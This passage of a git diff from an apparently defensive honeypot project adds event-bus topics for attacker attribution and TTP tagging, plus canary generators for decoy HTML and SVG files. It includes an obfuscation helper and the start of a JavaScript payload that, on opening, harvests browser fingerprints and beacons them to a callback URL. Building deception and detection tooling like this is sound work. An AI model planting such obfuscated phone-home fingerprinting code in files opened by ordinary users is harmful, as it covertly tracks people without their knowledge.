return lambda _topic, _payload, _event_type="": None # type: ignore[misc]
|
||||||
|
|
||||||
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
|
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
|
||||||
# Stream threads may keep draining after the bus owner closed it
|
# Stream threads may keep draining after the bus owner closed it
|
||||||
|
|||||||
@@ -17,6 +17,7 @@ Token structure (NATS-style, dot-separated):
|
|||||||
attacker.scored
|
attacker.scored
|
||||||
attacker.session.started
|
attacker.session.started
|
||||||
attacker.session.ended
|
attacker.session.ended
|
||||||
|
attacker.observation.{primitive}
|
||||||
identity.formed
|
identity.formed
|
||||||
identity.observation.linked
|
identity.observation.linked
|
||||||
identity.merged
|
identity.merged
|
||||||
@@ -28,12 +29,18 @@ Token structure (NATS-style, dot-separated):
|
|||||||
campaign.unmerged
|
campaign.unmerged
|
||||||
credential.captured
|
credential.captured
|
||||||
credential.reuse.detected
|
credential.reuse.detected
|
||||||
|
attribution.profile.state_changed
|
||||||
|
attribution.profile.multi_actor_suspected
|
||||||
canary.{token_id}.triggered
|
canary.{token_id}.triggered
|
||||||
canary.{token_id}.placed
|
canary.{token_id}.placed
|
||||||
canary.{token_id}.revoked
|
canary.{token_id}.revoked
|
||||||
system.log
|
system.log
|
||||||
system.bus.health
|
system.bus.health
|
||||||
system.{worker}.health
|
system.{worker}.health
|
||||||
|
email.received
|
||||||
|
ttp.tagged
|
||||||
|
ttp.rule.fired.{technique_id}
|
||||||
|
ttp.rule.suppressed
|
||||||
|
|
||||||
Wildcards (per :func:`decnet.bus.base.matches`):
|
Wildcards (per :func:`decnet.bus.base.matches`):
|
||||||
|
|
||||||
@@ -52,8 +59,12 @@ IDENTITY = "identity"
|
|||||||
CAMPAIGN = "campaign"
|
CAMPAIGN = "campaign"
|
||||||
SYSTEM = "system"
|
SYSTEM = "system"
|
||||||
CREDENTIAL = "credential"
|
CREDENTIAL = "credential"
|
||||||
|
ATTRIBUTION = "attribution"
|
||||||
ORCHESTRATOR = "orchestrator"
|
ORCHESTRATOR = "orchestrator"
|
||||||
CANARY = "canary"
|
CANARY = "canary"
|
||||||
|
SMTP = "smtp"
|
||||||
|
EMAIL = "email"
|
||||||
|
TTP = "ttp"
|
||||||
|
|
||||||
|
|
||||||
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
||||||
@@ -83,6 +94,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
|
|||||||
# syslog sidechannel too) to interleave substrate-change markers into
|
# syslog sidechannel too) to interleave substrate-change markers into
|
||||||
# attacker traversals.
|
# attacker traversals.
|
||||||
DECKY_MUTATION = "mutation"
|
DECKY_MUTATION = "mutation"
|
||||||
|
# Per-service add/remove on a deployed decky (live; no full redeploy).
|
||||||
|
# Payload carries ``decky_name``, ``service_name``, optional
|
||||||
|
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
|
||||||
|
# that watch substrate shape (correlator, dashboard, profiler) reconcile
|
||||||
|
# off these without waiting for the next decnet-state.json snapshot.
|
||||||
|
DECKY_SERVICE_ADDED = "service_added"
|
||||||
|
DECKY_SERVICE_REMOVED = "service_removed"
|
||||||
|
# Per-service config change (the schema-driven Inspector form). Payload
|
||||||
|
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
|
||||||
|
# ``service_config`` (the new validated dict), and ``recreated`` — true
|
||||||
|
# when the operator hit Apply (container was force-recreated to pick up
|
||||||
|
# the new env), false when they only hit Save (DB-only).
|
||||||
|
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
|
||||||
|
|
||||||
# Attacker event types (second token under the ``attacker`` root). First
|
# Attacker event types (second token under the ``attacker`` root). First
|
||||||
# sighting, session boundary transitions, and score-threshold crossings
|
# sighting, session boundary transitions, and score-threshold crossings
|
||||||
@@ -94,6 +118,14 @@ ATTACKER_SCORED = "scored"
|
|||||||
# Distinct from ``observed`` which is the correlator's first-sight signal —
|
# Distinct from ``observed`` which is the correlator's first-sight signal —
|
||||||
# a fingerprint is additional evidence about an already-observed attacker.
|
# a fingerprint is additional evidence about an already-observed attacker.
|
||||||
ATTACKER_FINGERPRINTED = "fingerprinted"
|
ATTACKER_FINGERPRINTED = "fingerprinted"
|
||||||
|
# Published when the prober observes a NEW hash for an
|
||||||
|
# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
|
||||||
|
# attacker rotated their VPS, rebuilt their SSH server, swapped their
|
||||||
|
# TLS cert. Distinct from ``fingerprinted`` which fires on every probe
|
||||||
|
# result; ``fingerprint_rotated`` fires only on diff and carries both
|
||||||
|
# old_hash + new_hash. Producer: prober (via the rotation library);
|
||||||
|
# consumers: dashboard, forensics, attribution clustering.
|
||||||
|
ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
|
||||||
ATTACKER_SESSION_STARTED = "session.started"
|
ATTACKER_SESSION_STARTED = "session.started"
|
||||||
ATTACKER_SESSION_ENDED = "session.ended"
|
ATTACKER_SESSION_ENDED = "session.ended"
|
||||||
# Published by the ``decnet enrich`` worker after an enrichment pass
|
# Published by the ``decnet enrich`` worker after an enrichment pass
|
||||||
@@ -101,6 +133,19 @@ ATTACKER_SESSION_ENDED = "session.ended"
|
|||||||
# returned a verdict). Payload carries the aggregate verdict + per-
|
# returned a verdict). Payload carries the aggregate verdict + per-
|
||||||
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
|
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
|
||||||
ATTACKER_INTEL_ENRICHED = "intel.enriched"
|
ATTACKER_INTEL_ENRICHED = "intel.enriched"
|
||||||
|
# Per-primitive BEHAVE-SHELL observation. Full topic shape:
|
||||||
|
# attacker.observation.<primitive>
|
||||||
|
# e.g. ``attacker.observation.motor.input_modality``. Producer:
|
||||||
|
# ``decnet/profiler/behave_shell/`` (extractor library called from the
|
||||||
|
# profiler worker on ``attacker.session.ended``); consumers: dashboard
|
||||||
|
# SSE relay, attribution engine state machine, federation gossip
|
||||||
|
# (post-v0). See development/BEHAVE-INTEGRATION.md §"Bus topics" for
|
||||||
|
# the wire-format contract — the prefix is documentation + pattern
|
||||||
|
# match only; bus auth is socket file perms (DEBT-029 §2), not
|
||||||
|
# topic-level. The ``primitive`` segment MAY contain dots
|
||||||
|
# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
|
||||||
|
# rule that ``attacker.session.ended`` uses.
|
||||||
|
ATTACKER_OBSERVATION_PREFIX = "observation"
|
||||||
|
|
||||||
# Identity-resolution event types (second/third tokens under ``identity``).
|
# Identity-resolution event types (second/third tokens under ``identity``).
|
||||||
# Published by the (future) clusterer worker — see
|
# Published by the (future) clusterer worker — see
|
||||||
@@ -168,6 +213,42 @@ CAMPAIGN_UNMERGED = "unmerged"
|
|||||||
CREDENTIAL_CAPTURED = "captured"
|
CREDENTIAL_CAPTURED = "captured"
|
||||||
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
|
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
|
||||||
|
|
||||||
|
# Attribution-engine event types (second/third tokens under
|
||||||
|
# ``attribution``). Published by the v0 attribution worker
|
||||||
|
# (``decnet.correlation.attribution_worker``) which subscribes to
|
||||||
|
# ``attacker.observation.>`` and runs the per-(identity, primitive)
|
||||||
|
# state machine. See ``development/ATTRIBUTION-ENGINE.md``.
|
||||||
|
#
|
||||||
|
# attribution.profile.state_changed — per-primitive state
|
||||||
|
# transition (e.g.
|
||||||
|
# stable → drifting).
|
||||||
|
# Payload: identity_uuid,
|
||||||
|
# primitive, old_state,
|
||||||
|
# new_state, current_value,
|
||||||
|
# confidence,
|
||||||
|
# observation_count, ts.
|
||||||
|
# attribution.profile.multi_actor_suspected — fires when ≥ 2
|
||||||
|
# primitives flag the same
|
||||||
|
# identity as multi_actor
|
||||||
|
# concurrently. Cross-
|
||||||
|
# primitive correlator;
|
||||||
|
# single-primitive
|
||||||
|
# multi_actor is too noisy
|
||||||
|
# on its own. Payload:
|
||||||
|
# identity_uuid, primitives,
|
||||||
|
# evidence_summary,
|
||||||
|
# confidence, ts.
|
||||||
|
#
|
||||||
|
# These are *derived* signals — distinct from
|
||||||
|
# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
|
||||||
|
# ``attacker.observation.*`` (raw extractor envelopes,
|
||||||
|
# BEHAVE-INTEGRATION.md). The three families compose: observations feed
|
||||||
|
# the attribution engine, the engine emits derived state, the clusterer
|
||||||
|
# reads observations + state to form / merge identities.
|
||||||
|
ATTRIBUTION_PROFILE_PREFIX = "profile"
|
||||||
|
ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
|
||||||
|
ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
|
||||||
|
|
||||||
# Canary-token event types (third token under ``canary``).
|
# Canary-token event types (third token under ``canary``).
|
||||||
#
|
#
|
||||||
# canary.{token_id}.placed — orchestrator/API successfully planted a
|
# canary.{token_id}.placed — orchestrator/API successfully planted a
|
||||||
@@ -231,6 +312,43 @@ WORKER_CONTROL_START = "start"
|
|||||||
# of patterns. Payload is currently empty; consumers only need the signal.
|
# of patterns. Payload is currently empty; consumers only need the signal.
|
||||||
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
|
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
|
||||||
|
|
||||||
|
# Email-receipt event — fired by smtp / smtp-relay services on full-message
|
||||||
|
# receipt (envelope + headers + body + attachments captured). Single-token
|
||||||
|
# leaf so the bus tokenizer accepts it directly under the ``email`` root.
|
||||||
|
# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
|
||||||
|
# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
|
||||||
|
# counts, header names, and rcpt-domain sets — never rcpt addresses or body
|
||||||
|
# bytes.
|
||||||
|
EMAIL_RECEIVED = "received"
|
||||||
|
|
||||||
|
# TTP-tagging event types (second/third tokens under ``ttp``).
|
||||||
|
#
|
||||||
|
# ttp.tagged — one or more new tags written. Published
|
||||||
|
# only when ``INSERT OR IGNORE`` wrote at
|
||||||
|
# least one new row; idempotent
|
||||||
|
# re-evaluations publish nothing
|
||||||
|
# (loop-prevention invariant — see
|
||||||
|
# TTP_TAGGING.md).
|
||||||
|
# ttp.rule.fired.{technique_id} — per-technique fan-out for SIEM
|
||||||
|
# consumers that subscribe to a single
|
||||||
|
# technique. Topic key is the parent
|
||||||
|
# technique; sub_technique is in the
|
||||||
|
# payload. Built via :func:`ttp_rule_fired`.
|
||||||
|
# ttp.rule.suppressed — rule fired but the tag was dropped
|
||||||
|
# (confidence below floor, rate-limited,
|
||||||
|
# or the rule's RuleState was disabled).
|
||||||
|
# Observability signal for the dashboard.
|
||||||
|
#
|
||||||
|
# Per-rule reload + state-change topics. Built via
|
||||||
|
# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
|
||||||
|
# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
|
||||||
|
# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
|
||||||
|
TTP_TAGGED = "tagged"
|
||||||
|
TTP_RULE_FIRED = "rule.fired"
|
||||||
|
TTP_RULE_SUPPRESSED = "rule.suppressed"
|
||||||
|
TTP_RULE_RELOADED = "rule.reloaded"
|
||||||
|
TTP_RULE_STATE = "rule.state"
|
||||||
|
|
||||||
|
|
||||||
# ─── Builders ────────────────────────────────────────────────────────────────
|
# ─── Builders ────────────────────────────────────────────────────────────────
|
||||||
|
|
||||||
@@ -301,6 +419,42 @@ def attacker(event_type: str) -> str:
|
|||||||
return f"{ATTACKER}.{event_type}"
|
return f"{ATTACKER}.{event_type}"
|
||||||
|
|
||||||
|
|
||||||
|
def attacker_observation(primitive: str) -> str:
|
||||||
|
"""Build ``attacker.observation.<primitive>``.
|
||||||
|
|
||||||
|
*primitive* is the fully-qualified BEHAVE-SHELL primitive path
|
||||||
|
(e.g. ``motor.input_modality``,
|
||||||
|
``cognitive.feedback_loop_engagement``,
|
||||||
|
``motor.shell_mastery.tab_completion``). Dotted primitives are
|
||||||
|
permitted — this matches the format
|
||||||
|
``behave_shell.spec.event_adapter.event_topic_for`` produces
|
||||||
|
upstream, and DECNET's bus admits the dotted leaf the same way
|
||||||
|
:func:`attacker` does for ``session.started``.
|
||||||
|
|
||||||
|
Empty string is rejected so a downstream typo doesn't ship as
|
||||||
|
``attacker.observation.``.
|
||||||
|
"""
|
||||||
|
if not primitive:
|
||||||
|
raise ValueError(
|
||||||
|
"attacker_observation topic requires a non-empty primitive",
|
||||||
|
)
|
||||||
|
return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
|
||||||
|
|
||||||
|
|
||||||
|
def attribution(event_type: str) -> str:
|
||||||
|
"""Build ``attribution.<event_type>``.
|
||||||
|
|
||||||
|
*event_type* is typically one of
|
||||||
|
:data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
|
||||||
|
:data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED` — both contain a
|
||||||
|
dot (``profile.state_changed``) which is permitted under the same
|
||||||
|
"trailing dotted leaf" rule that ``attacker.session.started`` uses.
|
||||||
|
"""
|
||||||
|
if not event_type:
|
||||||
|
raise ValueError("attribution topic requires a non-empty event_type")
|
||||||
|
return f"{ATTRIBUTION}.{event_type}"
|
||||||
|
|
||||||
|
|
||||||
def campaign(event_type: str) -> str:
|
def campaign(event_type: str) -> str:
|
||||||
"""Build ``campaign.<event_type>``.
|
"""Build ``campaign.<event_type>``.
|
||||||
|
|
||||||
@@ -381,6 +535,86 @@ def system_control(worker: str) -> str:
|
|||||||
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
|
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
|
||||||
|
|
||||||
|
|
||||||
|
def smtp(event_type: str) -> str:
|
||||||
|
"""Build ``smtp.<event_type>``.
|
||||||
|
|
||||||
|
*event_type* may contain dots (e.g. ``probe.pending``).
|
||||||
|
"""
|
||||||
|
if not event_type:
|
||||||
|
raise ValueError("smtp topic requires a non-empty event_type")
|
||||||
|
return f"{SMTP}.{event_type}"
|
||||||
|
|
||||||
|
|
||||||
|
def email_topic(event_type: str) -> str:
|
||||||
|
"""Build ``email.<event_type>``.
|
||||||
|
|
||||||
|
Named ``email_topic`` rather than ``email`` to avoid shadowing the
|
||||||
|
Python ``email`` stdlib package at import sites that pull both.
|
||||||
|
*event_type* is typically :data:`EMAIL_RECEIVED`.
|
||||||
|
"""
|
||||||
|
if not event_type:
|
||||||
|
raise ValueError("email topic requires a non-empty event_type")
|
||||||
|
return f"{EMAIL}.{event_type}"
|
||||||
|
|
||||||
|
|
||||||
|
def ttp(event_type: str) -> str:
|
||||||
|
"""Build ``ttp.<event_type>``.
|
||||||
|
|
||||||
|
*event_type* is typically one of :data:`TTP_TAGGED`,
|
||||||
|
:data:`TTP_RULE_FIRED`, or :data:`TTP_RULE_SUPPRESSED`. Dotted
|
||||||
|
leaves (``rule.fired``) are permitted — same rationale as
|
||||||
|
:func:`system`. For per-technique fan-out use
|
||||||
|
:func:`ttp_rule_fired`.
|
||||||
|
"""
|
||||||
|
if not event_type:
|
||||||
|
raise ValueError("ttp topic requires a non-empty event_type")
|
||||||
|
return f"{TTP}.{event_type}"
|
||||||
|
|
||||||
|
|
||||||
|
def ttp_rule_fired(technique_id: str) -> str:
|
||||||
|
"""Build ``ttp.rule.fired.<technique_id>``.
|
||||||
|
|
||||||
|
Per-technique fan-out: SIEM subscribers can listen on
|
||||||
|
``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
|
||||||
|
one technique. *technique_id* is validated as a single segment —
|
||||||
|
sub-techniques like ``T1110.001`` are rejected because they would
|
||||||
|
split into two tokens. The topic key is the parent technique;
|
||||||
|
``sub_technique_id`` lives in the payload.
|
||||||
|
"""
|
||||||
|
_reject_tokens(technique_id)
|
||||||
|
return f"{TTP}.rule.fired.{technique_id}"
|
||||||
|
|
||||||
|
|
||||||
|
def ttp_rule_reloaded(rule_id: str) -> str:
|
||||||
|
"""Build ``ttp.rule.reloaded.<rule_id>``.
|
||||||
|
|
||||||
|
Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
|
||||||
|
when a rule's *definition* changes (YAML edit on the filesystem
|
||||||
|
backend, ``ttp_rule`` row update on the database backend). One event
|
||||||
|
per per-rule edit — never batched (the "incremental, never batched"
|
||||||
|
property in TTP_TAGGING.md §"Bus topics" inherits its granularity
|
||||||
|
from :meth:`RuleStore.subscribe_changes`).
|
||||||
|
|
||||||
|
Subscribers: ``ttp.rule.reloaded.>`` for every rule,
|
||||||
|
``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
|
||||||
|
single segment.
|
||||||
|
"""
|
||||||
|
_reject_tokens(rule_id)
|
||||||
|
return f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
|
||||||
|
|
||||||
|
|
||||||
|
def ttp_rule_state(rule_id: str) -> str:
|
||||||
|
"""Build ``ttp.rule.state.<rule_id>``.
|
||||||
|
|
||||||
|
Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
|
||||||
|
when a rule's *operational state* changes (operator hits the disable
|
||||||
|
button, an ``expires_at`` TTL fires and auto-reverts the state).
|
||||||
|
*rule_id* is validated as a single segment.
|
||||||
|
"""
|
||||||
|
_reject_tokens(rule_id)
|
||||||
|
return f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
|
||||||
|
|
||||||
|
|
||||||
def _reject_tokens(*parts: str) -> None:
|
def _reject_tokens(*parts: str) -> None:
|
||||||
"""Reject topic segments that would break NATS-style tokenization.
|
"""Reject topic segments that would break NATS-style tokenization.
|
||||||
|
|
||||||
|
|||||||
18
decnet/canary/_obfuscate_helper.js
Normal file
18
decnet/canary/_obfuscate_helper.js
Normal file
@@ -0,0 +1,18 @@
|
|||||||
|
// Node helper invoked by decnet.canary.obfuscator.
|
||||||
|
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
|
||||||
|
// Kept dependency-light on purpose: only javascript-obfuscator.
|
||||||
|
const JsObf = require('javascript-obfuscator');
|
||||||
|
|
||||||
|
let raw = '';
|
||||||
|
process.stdin.setEncoding('utf8');
|
||||||
|
process.stdin.on('data', (chunk) => { raw += chunk; });
|
||||||
|
process.stdin.on('end', () => {
|
||||||
|
try {
|
||||||
|
const { code, options } = JSON.parse(raw);
|
||||||
|
const result = JsObf.obfuscate(code, options || {});
|
||||||
|
process.stdout.write(result.getObfuscatedCode());
|
||||||
|
} catch (e) {
|
||||||
|
process.stderr.write(String(e && e.stack || e));
|
||||||
|
process.exit(2);
|
||||||
|
}
|
||||||
|
});
|
||||||
@@ -100,6 +100,12 @@ class CanaryArtifact:
|
|||||||
planting. Never leaked to the attacker-facing surface.
|
planting. Never leaked to the attacker-facing surface.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
fingerprint_nonce: Optional[str] = None
|
||||||
|
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
|
||||||
|
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
|
||||||
|
so the worker can validate incoming ``?k=`` params.
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
class CanaryGenerator(ABC):
|
class CanaryGenerator(ABC):
|
||||||
"""Produces a fake artifact from scratch."""
|
"""Produces a fake artifact from scratch."""
|
||||||
|
|||||||
@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
||||||
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
|
|||||||
"honeydoc_pdf": "http",
|
"honeydoc_pdf": "http",
|
||||||
"ssh_key": "dns", # trip is DNS resolution of host comment
|
"ssh_key": "dns", # trip is DNS resolution of host comment
|
||||||
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
||||||
|
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
|
||||||
|
"fingerprint_svg": "http", # same, embedded inside SVG <script>
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
||||||
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -136,10 +142,12 @@ async def cultivate(
|
|||||||
)
|
)
|
||||||
|
|
||||||
callback_token = _new_callback_token()
|
callback_token = _new_callback_token()
|
||||||
|
http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
|
||||||
|
dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
|
||||||
ctx = CanaryContext(
|
ctx = CanaryContext(
|
||||||
callback_token=callback_token,
|
callback_token=callback_token,
|
||||||
http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
|
http_base=http_base_str,
|
||||||
dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
|
dns_zone=dns_zone_str,
|
||||||
persona="linux", # all our deckies are POSIX in MVP
|
persona="linux", # all our deckies are POSIX in MVP
|
||||||
)
|
)
|
||||||
generator = get_generator(gen_name)
|
generator = get_generator(gen_name)
|
||||||
@@ -154,7 +162,7 @@ async def cultivate(
|
|||||||
# attribute a callback if the artifact trips during the plant
|
# attribute a callback if the artifact trips during the plant
|
||||||
# itself (improbable but possible — DOCX viewers can preview
|
# itself (improbable but possible — DOCX viewers can preview
|
||||||
# autoplay-style).
|
# autoplay-style).
|
||||||
await repo.create_canary_token({
|
token_data: dict = {
|
||||||
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
||||||
"decky_name": plan.decky_name,
|
"decky_name": plan.decky_name,
|
||||||
"instrumenter": None,
|
"instrumenter": None,
|
||||||
@@ -165,7 +173,10 @@ async def cultivate(
|
|||||||
"placed_at": datetime.now(timezone.utc),
|
"placed_at": datetime.now(timezone.utc),
|
||||||
"created_by": created_by,
|
"created_by": created_by,
|
||||||
"state": "planted",
|
"state": "planted",
|
||||||
})
|
}
|
||||||
|
if artifact.fingerprint_nonce is not None:
|
||||||
|
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
|
||||||
|
await repo.create_canary_token(token_data)
|
||||||
|
|
||||||
# Carry the placement_path on the artifact so the orchestrator's
|
# Carry the placement_path on the artifact so the orchestrator's
|
||||||
# plant_file call uses it. We don't mutate the generator's
|
# plant_file call uses it. We don't mutate the generator's
|
||||||
|
|||||||
@@ -131,7 +131,7 @@ def _build_response(
|
|||||||
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
|
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
|
||||||
|
|
||||||
answer = b""
|
answer = b""
|
||||||
if an_count:
|
if an_count and answer_ip is not None:
|
||||||
# Use a name pointer back to the question (offset 12).
|
# Use a name pointer back to the question (offset 12).
|
||||||
ptr = struct.pack("!H", 0xC000 | 12)
|
ptr = struct.pack("!H", 0xC000 | 12)
|
||||||
rdata = bytes(int(o) for o in answer_ip.split("."))
|
rdata = bytes(int(o) for o in answer_ip.split("."))
|
||||||
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
|
|||||||
self._answer_ip = answer_ip
|
self._answer_ip = answer_ip
|
||||||
self._transport: Optional[asyncio.DatagramTransport] = None
|
self._transport: Optional[asyncio.DatagramTransport] = None
|
||||||
|
|
||||||
def connection_made(self, transport) -> None: # type: ignore[override]
|
def connection_made(self, transport) -> None:
|
||||||
self._transport = transport # type: ignore[assignment]
|
self._transport = transport
|
||||||
|
|
||||||
def datagram_received( # type: ignore[override]
|
def datagram_received(
|
||||||
self, data: bytes, addr: Tuple[str, int],
|
self, data: bytes, addr: Tuple[str, int],
|
||||||
) -> None:
|
) -> None:
|
||||||
try:
|
try:
|
||||||
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
|
|||||||
return
|
return
|
||||||
# Known name — answer with our sinkhole IP, then fire the hook.
|
# Known name — answer with our sinkhole IP, then fire the hook.
|
||||||
self._send(addr, _build_response(query, answer_ip=self._answer_ip))
|
self._send(addr, _build_response(query, answer_ip=self._answer_ip))
|
||||||
asyncio.create_task(self._hook(slug, query, addr[0]))
|
asyncio.ensure_future(self._hook(slug, query, addr[0]))
|
||||||
|
|
||||||
def _slug_for(self, qname: str) -> Optional[str]:
|
def _slug_for(self, qname: str) -> Optional[str]:
|
||||||
if not self._zone or not qname.endswith(self._suffix):
|
if not self._zone or not qname.endswith(self._suffix):
|
||||||
|
|||||||
@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
|
|||||||
"honeydoc_docx",
|
"honeydoc_docx",
|
||||||
"honeydoc_pdf",
|
"honeydoc_pdf",
|
||||||
"mysql_dump",
|
"mysql_dump",
|
||||||
|
"fingerprint_html",
|
||||||
|
"fingerprint_svg",
|
||||||
)
|
)
|
||||||
|
|
||||||
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
||||||
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
|
|||||||
if name == "mysql_dump":
|
if name == "mysql_dump":
|
||||||
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
||||||
return MySQLDumpGenerator()
|
return MySQLDumpGenerator()
|
||||||
|
if name == "fingerprint_html":
|
||||||
|
from decnet.canary.generators.fingerprint_html import (
|
||||||
|
FingerprintHtmlGenerator,
|
||||||
|
)
|
||||||
|
return FingerprintHtmlGenerator()
|
||||||
|
if name == "fingerprint_svg":
|
||||||
|
from decnet.canary.generators.fingerprint_svg import (
|
||||||
|
FingerprintSvgGenerator,
|
||||||
|
)
|
||||||
|
return FingerprintSvgGenerator()
|
||||||
raise ValueError(
|
raise ValueError(
|
||||||
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
||||||
)
|
)
|
||||||
|
|||||||
291
decnet/canary/fingerprint_payload.js
Normal file
291
decnet/canary/fingerprint_payload.js
Normal file
@@ -0,0 +1,291 @@
|
|||||||
|
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
|
||||||
|
// canary, harvests browser primitives, and beacons the result back to the
|
||||||
|
// canary worker. Ported from canary-self-test.html with the rendering UI
|
||||||
|
// stripped out.
|
||||||
|
//
|
||||||
|
// Three placeholders are substituted by the Python builder BEFORE
|
||||||
|
// javascript-obfuscator runs:
|
||||||
|
//
|
||||||
|
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
|
||||||
|
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
|
||||||
|
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
|
||||||
|
//
|
||||||
|
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
|
||||||
|
// then a fingerprint payload sent as a base64-URL query param on a second
|
||||||
|
// GET so the existing worker records the hit even before step-4 POST
|
||||||
|
// support lands. Both fail-open: any error short-circuits to next step.
|
||||||
|
|
||||||
|
(async function () {
|
||||||
|
var BEACON_URL = "{{BEACON_URL}}";
|
||||||
|
var MINT_UUID = "{{MINT_UUID}}";
|
||||||
|
var MINT_NONCE = "{{MINT_NONCE}}";
|
||||||
|
var fp = { mint: MINT_UUID };
|
||||||
|
|
||||||
|
function fire(url) {
|
||||||
|
try {
|
||||||
|
var img = new Image();
|
||||||
|
img.src = url;
|
||||||
|
} catch (e) { /* swallow */ }
|
||||||
|
}
|
||||||
|
|
||||||
|
// 1) bare-open beacon — fires regardless of whether the rest succeeds
|
||||||
|
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
|
||||||
|
|
||||||
|
function sha256(str) {
|
||||||
|
var buf = new TextEncoder().encode(str);
|
||||||
|
